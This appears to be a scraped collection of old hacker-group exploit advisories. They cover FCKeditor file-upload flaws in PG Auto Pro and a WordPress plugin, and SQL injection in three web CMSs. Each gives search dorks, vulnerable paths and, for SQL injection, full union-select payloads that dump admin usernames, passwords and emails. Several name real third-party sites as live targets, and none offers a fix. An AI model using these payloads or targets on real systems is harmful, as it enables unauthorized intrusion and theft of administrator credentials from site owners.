PG Auto Pro Classifieds Software Shell Upload

###########################################################################################################
## PG Auto Pro classifieds software (FCKeditor) Arbitary File Upload ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : www.indonesiancoder.com | www.exploit-id.com | www.magelangcyber.web.id ##
## Date : 14 May, 2011 ##
###########################################################################################################

[ Software Information ]

[+] Vendor : http://www.pgautopro.com/
[+] Download : – ( because not free :( )
[+] Price : PG Auto Pro $499.00 ( http://www.pgautopro.com/pricing.php )
[+] version : -
[+] Vulnerability : File Upload
[+] Dork : “CiHuY”
[+] LOCATION : INDONESIA – JOGJA

###########################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/system/plugins/fckeditor/editor/filemanager/connectors/test.html

[ Shell ]

http://127.0.0.1/[kaMtiEz]/uploads/file/YourFile.txt

[ DEMO ]

http://demo.pgautopro.com/system/plugins/fckeditor/editor/filemanager/connectors/test.html

http://sparkimotors.com/system/plugins/fckeditor/editor/filemanager/connectors/test.html

[ FIX ]

dunno :”>

###########################################################################################################

[ Thx TO ]

[+] INDONESIANCODER – EXPLOIT-ID – MAGELANGCYBER TEAM – MALANGCYBER CREW – KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,El k4mpr3t0 dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ]

[+] For Wantexz .. Get Well Soon My Friends :)
[+] Special Thx to my brotherhood in DejavuNet :D
[+] Jangan Takut , Luka Pasti Akan Sembuh :)

[ QUOTE ]

[+] INDONESIANHAXOR still r0x
[+] nothing secure ..

WordPress EditorMonkey (FCKeditor) Remote File Upload

## WordPress EditorMonkey (FCKeditor) Remote File Upload
## Author : kaMtiEz (kamtiez@exploit-id.com)
## Homepage : www.indonesiancoder.com | www.exploit-id.com | www.magelangcyber.web.id
## Date : 14 May, 2011

[ Software Information ]

[+] Vendor : http://rajprasad.wordpress.com/plugins/editormonkey/
[+] Download : http://www.kumovies.com/wp-content/plugins/editormonkey.tar.gz
[+] version : 2.5 or lower maybe also affected
[+] Vulnerability : File Upload
[+] Dork : “CiHuY”
[+] LOCATION : INDONESIA – JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html

[ Shell ]

http://127.0.0.1/[kaMtiEz]/UserFiles/YourFile.txt

[ DEMO ]

http://ideashaveconsequences.org/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html

[ FIX ]

dunno :”>

#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER – EXPLOIT-ID – MAGELANGCYBER TEAM – MALANGCYBER CREW – KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,El k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ]

[+] For Wantexz .. Get Well Soon My Friends :)
[+] Special Thx to my brotherhood in DejavuNet :D
[+] Jangan Takut , Luka Pasti Akan Sembuh :)

[ QUOTE ]

[+] INDONESIANHAXOR still r0x
[+] nothing secure ..

CMS WEBjump! SQL Injection

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

–== Dork ==–
Powered by Content Management System WEBjump! “portfolio_genre.php?id=”

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version–

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version–

–== Dork ==–
Powered by Content Management System WEBjump! “news_id.php?lang=”

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5–

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5–

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]

Source

Giga Nepal SQL Injection Vulnerability

======================================
Author : Gonzhack

Contact : gonzhack@gmail.com

Home : Http://www.indonesiancoder.com

======================================
D0rk : Powered By Giga Nepal
======================================
Bug :

/newsdetail.php?id=[sql]

POC :

-2+union+select+1,concat(username,0x3a,password),3,4,5,6+from+mytbladminlogin–

======================================

Source

Powered by eNdonesia 8.3

____________________________________________________
————————-IndonesiaCoder Team—————————
____________________________________________________

Author : CYB3R_TR0N
Contact : ds1.webdeessaint@yahoo.com
website : www.indonesiancoder.com , www.webdeessaint.com
____________________________________________________

#
Dork :
Powered by eNdonesia 8.3 mod.php?id=

#
Example:

http://www.site.com/mod.php?mod=publisher&op=viewarticle&artid={SQL}

#
Exploit :
-9999+union+select+1,2,3,concat_ws(0×3a,aid,email,pwd),5,6,7,8,9,10,11+from+authors–

____________________________________________________

————————————————————————-
cyb3rtr0n
Indonesian Coder Team
www.webdeessaint.com

————————————————————————-

GreetZ :
—> All IndonesiaCoder Team
—> Agiinda Wardani

————————[ Fifala Indonesian Coder Team ]————————

Source